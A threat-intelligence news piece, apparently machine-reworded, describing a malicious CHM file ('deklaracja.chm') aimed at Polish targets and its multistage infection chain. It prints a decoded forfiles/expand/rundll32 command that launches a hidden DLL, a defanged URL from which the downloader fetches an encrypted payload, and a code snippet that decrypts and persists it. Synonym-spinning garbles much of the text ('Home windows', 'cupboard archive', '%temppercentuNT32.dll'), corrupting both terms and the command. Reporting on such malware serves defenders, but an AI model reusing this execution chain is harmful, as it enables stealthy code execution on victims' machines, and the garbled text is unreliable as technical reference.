A malicious Microsoft Compiled HTML Assist (CHM) file uploaded from Poland on 30 June 2025 has proven how a legacy documentation format will be repurposed right into a potent supply automobile for contemporary malware.
Named “deklaracja.chm,” the archive masquerades as a financial institution‐switch declaration and opens with a benign receipt picture, lulling victims right into a false sense of safety whereas concealing a complicated multistage payload.
deklaracja.chm file contents (Supply – GitHub)
The assault begins the second Home windows Assist executable (hh.exe) processes the CHM. Buried inside is an obfuscated index.htm whose JavaScript decodes a prolonged hexadecimal blob, dynamically writes HTML, and silently downloads a disguised cupboard archive (desktop.mp3) by way of the deprecated “ tag.
This archive incorporates the true downloader DLL, but by no means betrays itself within the consumer interface.
dmpdump analysts famous that the script additionally instantiates the HTML Assist ActiveX management (adb880a6-d8ff-11cf-9377-00aa003b7a11) to execute a hidden command chain, leveraging the professional Home windows binary forfiles.exe to keep away from suspicious parent-child correlations.
The tactic displays a pattern in living-off-the-land (LotL) abuse, allowing attackers to sidestep many behavioral defenses whereas reaching code execution on totally patched techniques.
Whereas reviews attribute the infrastructure to the Belarus-linked FrostyNeighbor/UNC1151 cluster, the marketing campaign’s sensible hazard lies in its stealth.
Focusing on Polish entities, it reveals how a seemingly out of date file kind can pierce modern endpoint defenses, paving the best way for credential theft, espionage, or harmful follow-on operations.
An infection Mechanism in Focus
As soon as the ActiveX management runs, it programmatically clicks a crafted button that spawns a minimized command immediate.
The next one-liner—decompressed from a number of layers of encoding—illustrates the guts of the intrusion:-
cmd /min /c forfiles /p %temp% /m *.tmp /c “cmd /c if @fsize==180738 broaden @file %temppercentuNT32.dll & rundll32 %temppercentuNT32.dll,#1”
Right here, forfiles hunts for the freshly downloaded .tmp (precisely 180,738 bytes). When discovered, Home windows’ native broaden utility unpacks uNT32.dll from the cupboard, and rundll32 calls its export #1, launching the C++ downloader.
uNT32.dll (Supply – GitHub)
This DLL decrypts embedded strings with a 128-byte rotating XOR key, then makes use of WinHTTP to fetch hxxps://rustyquill[.]prime/shw/the-magnus-protoco1.jpg.
If the JPEG exceeds 289,109 bytes, the whole lot past that mark is XOR-decrypted into net32.dll, saved in %LocalAppDatapercentTaskSync and registered as a scheduled process—offering automated persistence with out registry writes.
if(payload_size > 0x46835){
decrypt(buffer + 0x46835, key, decrypted);
SaveAndExecute(decrypted, “TaskSyncnet32.dll”);
}
By this elegantly easy chain, legacy assist recordsdata develop into Trojan horses, mixing consumer interface tips, trusted Home windows binaries, and refined community visitors to attain a foothold that many safety instruments nonetheless underestimate.
Detect malware in a reside setting Analyze suspicious recordsdata & URLs in ANY.RUN’s Sandbox -> Strive for Free
